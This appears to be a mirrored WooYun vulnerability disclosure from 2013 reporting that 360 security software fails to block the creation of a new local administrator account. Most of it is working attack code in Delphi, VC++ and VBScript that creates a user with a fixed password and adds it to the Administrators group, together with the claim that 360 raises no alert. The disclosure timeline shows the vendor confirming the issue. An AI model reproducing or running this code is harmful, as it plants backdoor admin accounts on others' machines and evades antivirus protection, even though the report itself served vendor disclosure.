乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-04-25: 细节已通知厂商并且等待厂商处理中 2013-04-25: 厂商已经确认,细节仅向厂商公开 2013-04-28: 细节向第三方安全合作伙伴开放 2013-06-19: 细节向核心白帽子及相关领域专家公开 2013-06-29: 细节向普通白帽子公开 2013-07-09: 细节向实习白帽子公开 2013-07-24: 细节向公众公开
绕过360拦截添加用户!
delphi:
var f:textfile; beginassignfile(f,'x.vbs');rewrite(f);writeln(f,'set wsnetwork=CreateObject("WSCRIPT.NETWORK")');writeln(f,'os="WinNT://"&wsnetwork.ComputerName');writeln(f,'Set ob=GetObject(os)');writeln(f,'Set oe=GetObject(os&"/Administrators,group")');writeln(f,'Set od=ob.Create("user","test")');writeln(f,'od.SetPassword "gaimima"');writeln(f,'od.SetInfo');writeln(f,'Set of=GetObject(os&"/test",user)');writeln(f,'oe.add os&"/test" ');closefile(f);//winexec('x.vbs', SW_HIDE);ShellExecute(0,'open','x.vbs',nil,nil,sw_show);application.MessageBox('user:test'+#13#10+'pass:gaimima','提示!',0);deletefile('x.vbs');end;
VC:
DWORD dwLevel = 1; USER_INFO_1 ui; DWORD dwError = 0; USES_CONVERSION; LPWSTR name = A2W(m_netuser); LPWSTR pwd = A2W(m_netpass); LPWSTR Administrators = A2W(m_admin); ui.usri1_name =(WCHAR * )name; //这个是要添加的用户名,可以自己改改 ui.usri1_password =(WCHAR * )pwd; //这个是用户密码,也可以自己改改 ui.usri1_priv = USER_PRIV_USER; ui.usri1_home_dir = NULL; //本地路劲 ui.usri1_comment =L"系统管理员";// 描述 ui.usri1_flags = UF_SCRIPT; ui.usri1_script_path = NULL; //登陆脚本 NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError); wchar_t szAccountName[100]={0}; wcscpy(szAccountName,ui.usri1_name); LOCALGROUP_MEMBERS_INFO_3 account; account.lgrmi3_domainandname=szAccountName; //添加到Administrators组 NetLocalGroupAddMembers(NULL,Administrators,3,(LPBYTE)&account,1); SetDlgItemText(IDC_Log,"添加成功.......");
不光360,其他的安全类也拦截不到吧。。貌似mysql。sqlserver的添加用户 也拦截不到
set wsnetwork=CreateObject("WSCRIPT.NETWORK")'os="WinNT://"&wsnetwork.ComputerName'Set ob=GetObject(os)'Set oe=GetObject(os&"/Administrators,group")'Set od=ob.Create("user","test")'od.SetPassword "gaimima"'od.SetInfo');Set of=GetObject(os&"/test",user)'oe.add os&"/test" '
保存为vbs运行 360无反映
你们专业的
危害等级:低
漏洞Rank:3
确认时间:2013-04-25 18:14
感谢反馈,该问题已着手解决。
暂无